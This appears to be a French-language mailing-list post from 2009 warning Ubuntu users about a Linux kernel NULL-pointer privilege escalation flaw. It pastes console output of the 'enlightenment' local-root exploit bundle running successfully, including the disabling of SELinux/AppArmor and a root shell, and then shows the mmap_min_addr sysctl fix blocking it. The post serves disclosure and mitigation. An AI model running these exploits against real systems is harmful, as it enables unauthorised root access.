<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8"> <META NAME="GENERATOR" CONTENT="GtkHTML/3.26.0"> </HEAD> <BODY> Bonsoir à tous, Je viens de lire un article sur linuxfr.org: <A HREF="http://www.linuxfr.org/2009/11/05/26120.html">http://www.linuxfr.org/2009/11/05/26120.html</A> Cet article concerne une faille de sécurité sur le noyau permettant l'élévation de privilège d'un simple utilisateur. Je souhaite attirer votre attention sur cette partie plus spécialement Pour se protéger (ou vérifier si votre système est vulnérable ou non), assurez-vous que la valeur de /proc/sys/vm/mmap_min_addr ne soit pas nulle. Debian Sid, Mandriva Linux 2010.0, Fedora 12, Ubuntu (Ibex et supérieurs) et les noyaux patchés avec grsecurity ne sont pas vulnérables. Cependant lorsque je vérifie sur mon système (Ubuntu 9.04 amd64): jean@lehon:~$ cat /proc/sys/vm/mmap_min_addr 0 Mon noyau est bien vulnérable contrairement aux dire de l'article. Une personne ayant répondu à l'article le remarque également Le dépêche affirme que Ubuntu karmic n'est pas vulnérable. Or sur l'un de mes systèmes j'observe ceci: $ cat /proc/sys/vm/mmap_min_addr 0 et sur un autre l'observe ceci: $ cat /proc/sys/vm/mmap_min_addr 65536 Je ne sais pas encore d'où vient la différence, mais en tout cas, j'encourage tous les utilisateurs d'Ubuntu à vérifier eux mêmes. De plus voici le résultat de l'exploit sur mon système: jean@lehon:~/base_connaissance/exploit_linux/enlightenment$ ./run_null_exploits.sh Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...failed. Compiling exp_wunderbar.c...OK. [+] MAPPED ZERO PAGE! Choose your exploit: [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root [3] Powerglove: Linux 2.6.31 perf_counter local root [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root [5] Wunderbar Emporium: Linux 2.X sendpage() local root [6] Exit > 1 ------------------------------------------------------------------------------ We forfeit three-quarters of ourselves in order to be like other people. --Schopenhauer ------------------------------------------------------------------------------ [+] Resolved selinux_enforcing to 0xffffffff80b51928 [+] Resolved selinux_enabled to 0xffffffff80b51924 [+] Resolved apparmor_enabled to 0xffffffff808c1aa4 [+] Resolved apparmor_complain to 0xffffffff80b55044 [+] Resolved apparmor_audit to 0xffffffff80b5504c [+] Resolved apparmor_logsyscall to 0xffffffff80b55050 [+] Resolved security_ops to 0xffffffff80b4f0a8 [+] Resolved default_security_ops to 0xffffffff808bfc00 [+] Resolved sel_read_enforce to 0xffffffff803de1a0 [+] Resolved audit_enabled to 0xffffffff80b0e5c4 [+] Using newer pipe_inode_info layout [+] We'll let this go for a while if needed... [+] got ring0! [+] detected 2.6 style 8k stacks, with current at 0xffff88004c9f9660 [+] Disabled security of : LSM [+] Got root! sh: gthumb: not found # Après l'execution du script j'ai obtenu les droits root je suis parvenu à éditer des fichiers normalement non autorisés aux utilisateurs classiques. Après l'application du correctif de sécurité publié sur le site de Debian: <A HREF="http://wiki.debian.org/mmap_min_addr">http://wiki.debian.org/mmap_min_addr</A> jean@lehon:~/base_connaissance/exploit_linux/enlightenment$ sudo su root@lehon:/home/jean/base_connaissance/exploit_linux/enlightenment# echo "vm.mmap_min_addr = 4096" > /etc/sysctl.d/mmap_min_addr.conf root@lehon:/home/jean/base_connaissance/exploit_linux/enlightenment# /etc/init.d/procps restart * Setting kernel variables (/etc/sysctl.conf)... [ OK ] * Setting kernel variables (/etc/sysctl.d/10-console-messages.conf)... [ OK ] * Setting kernel variables (/etc/sysctl.d/10-network-security.conf)... [ OK ] * Setting kernel variables (/etc/sysctl.d/30-wine.conf)... [ OK ] * Setting kernel variables (/etc/sysctl.d/mmap_min_addr.conf)... [ OK ] root@lehon:/home/jean/base_connaissance/exploit_linux/enlightenment# exit exit jean@lehon:~/base_connaissance/exploit_linux/enlightenment$ cat /proc/sys/vm/mmap_min_addr 4096 jean@lehon:~/base_connaissance/exploit_linux/enlightenment$ ./run_null_exploits.sh Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...failed. Compiling exp_wunderbar.c...OK. [+] Personality set to: PER_SVR4 I: caps.c: Limited capabilities successfully to CAP_SYS_NICE. I: caps.c: Dropping root privileges. I: caps.c: Limited capabilities successfully to CAP_SYS_NICE. UNABLE TO MAP ZERO PAGE! jean@lehon:~/base_connaissance/exploit_linux/enlightenment$ L'exploit ne fonctionne plus. Par contre comme l'indique l'article sur debian un petit nombre d'application peuvent ne plus fonctionner correctement. Je vous encourage à vérifier pour vos systèmes. Jean </BODY> </HTML>